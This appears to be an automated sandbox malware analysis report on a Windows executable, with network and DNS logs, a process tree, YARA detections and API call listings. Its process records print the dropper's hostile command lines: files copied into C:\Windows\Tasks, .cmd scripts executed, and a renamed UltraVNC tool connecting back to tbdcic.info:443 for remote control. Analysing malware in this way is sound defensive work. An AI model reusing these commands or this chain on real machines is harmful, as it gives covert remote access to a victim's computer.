Dec 23, 2024 13:30:01.224040985 CET	49819	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:30:01.224423885 CET	49819	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:30:01.224437952 CET	443	49819	194.190.152.201	192.168.2.7
Dec 23, 2024 13:30:01.224483967 CET	443	49819	194.190.152.201	192.168.2.7
Dec 23, 2024 13:30:23.863852978 CET	49873	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:30:23.863955975 CET	443	49873	194.190.152.201	192.168.2.7
Dec 23, 2024 13:30:23.864033937 CET	49873	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:30:23.864175081 CET	49873	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:30:23.864197016 CET	443	49873	194.190.152.201	192.168.2.7
Dec 23, 2024 13:30:23.864259005 CET	443	49873	194.190.152.201	192.168.2.7
Dec 23, 2024 13:31:00.470407009 CET	49954	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:31:00.470444918 CET	443	49954	194.190.152.201	192.168.2.7
Dec 23, 2024 13:31:00.470529079 CET	49954	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:31:00.470686913 CET	49954	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:31:00.470695972 CET	443	49954	194.190.152.201	192.168.2.7
Dec 23, 2024 13:31:00.470740080 CET	443	49954	194.190.152.201	192.168.2.7
Dec 23, 2024 13:31:44.241327047 CET	49999	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:31:44.241427898 CET	443	49999	194.190.152.201	192.168.2.7
Dec 23, 2024 13:31:44.241833925 CET	49999	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:31:44.242012024 CET	49999	443	192.168.2.7	194.190.152.201
Dec 23, 2024 13:31:44.242038965 CET	443	49999	194.190.152.201	192.168.2.7
Dec 23, 2024 13:31:44.242131948 CET	443	49999	194.190.152.201	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:29:27.386189938 CET	61200	53	192.168.2.7	1.1.1.1
Dec 23, 2024 13:29:33.013232946 CET	57885	53	192.168.2.7	1.1.1.1
Dec 23, 2024 13:29:33.151983023 CET	53	57885	1.1.1.1	192.168.2.7
Dec 23, 2024 13:29:50.151766062 CET	63471	53	192.168.2.7	1.1.1.1
Dec 23, 2024 13:29:50.288768053 CET	53	63471	1.1.1.1	192.168.2.7
Dec 23, 2024 13:30:05.526115894 CET	52684	53	192.168.2.7	1.1.1.1
Dec 23, 2024 13:30:05.664683104 CET	53	52684	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 13:29:27.386189938 CET	192.168.2.7	1.1.1.1	0x8c34	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:33.013232946 CET	192.168.2.7	1.1.1.1	0x5c6c	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:50.151766062 CET	192.168.2.7	1.1.1.1	0xdfdc	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:05.526115894 CET	192.168.2.7	1.1.1.1	0xb56e	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 13:29:27.524158955 CET	1.1.1.1	192.168.2.7	0x8c34	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 13:29:29.344592094 CET	1.1.1.1	192.168.2.7	0x59d6	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:29.344592094 CET	1.1.1.1	192.168.2.7	0x59d6	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:33.151983023 CET	1.1.1.1	192.168.2.7	0x5c6c	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:29:50.288768053 CET	1.1.1.1	192.168.2.7	0xdfdc	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:05.664683104 CET	1.1.1.1	192.168.2.7	0xb56e	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:29.754944086 CET	1.1.1.1	192.168.2.7	0xad87	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:29.754944086 CET	1.1.1.1	192.168.2.7	0xad87	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:54.302576065 CET	1.1.1.1	192.168.2.7	0xbffa	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:30:54.302576065 CET	1.1.1.1	192.168.2.7	0xbffa	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:31:06.610454082 CET	1.1.1.1	192.168.2.7	0xbbfe	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:31:06.610454082 CET	1.1.1.1	192.168.2.7	0xbbfe	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	07:29:13
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\T8xrZb7nBL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\T8xrZb7nBL.exe"
Imagebase:	0x400000
File size:	1'670'955 bytes
MD5 hash:	1677BD5B561B890396AE1816066CA481
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:29:14
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:29:15
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Imagebase:	0x7ff702560000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:29:15
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:29:16
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im browser_sn.exe
Imagebase:	0x290000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:29:16
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	07:29:16
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:29:17
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	07:29:18
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:29:21
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:29:23
Start date:	23/12/2024
Path:	C:\Windows\Tasks\browser_sn.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\browser_sn.exe
Imagebase:	0x7ff790c30000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:29:23
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 8
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:21:44
Start date:	23/12/2024
Path:	C:\Windows\Tasks\browser_sn.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Imagebase:	0x7ff790c30000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:21:44
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:21:46
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 4
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:21:50
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c "C:\Windows\Tasks\3889122.cmd"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	09:21:50
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:21:51
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im browser_sn.exe
Imagebase:	0x290000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:21:51
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:21:53
Start date:	23/12/2024
Path:	C:\Windows\Tasks\browser_sn.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\browser_sn.exe
Imagebase:	0x7ff790c30000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	09:21:53
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 8
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:22:01
Start date:	23/12/2024
Path:	C:\Windows\Tasks\browser_sn.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
Imagebase:	0x7ff790c30000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:22:01
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 4
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:22:05
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 600
Imagebase:	0x840000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.6%
Total number of Nodes:	1619
Total number of Limit Nodes:	14

Executed Functions

Function 00405721 Relevance: 231.1, APIs: 93, Strings: 38, Instructions: 1811keyboardwindowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734

Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2

Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434

_wtol.MSVCRT ref: 00405825
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
_wtol.MSVCRT ref: 00405A25
??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
wsprintfW.USER32 ref: 00405D2A

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E

Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D

_wtol.MSVCRT ref: 00405F6B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
